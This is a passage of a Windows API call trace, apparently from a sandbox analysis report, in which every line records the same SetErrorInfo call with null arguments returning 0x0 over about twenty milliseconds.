[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.945] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.947] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.947] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.949] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.951] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.952] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.953] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.954] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.960] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.963] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
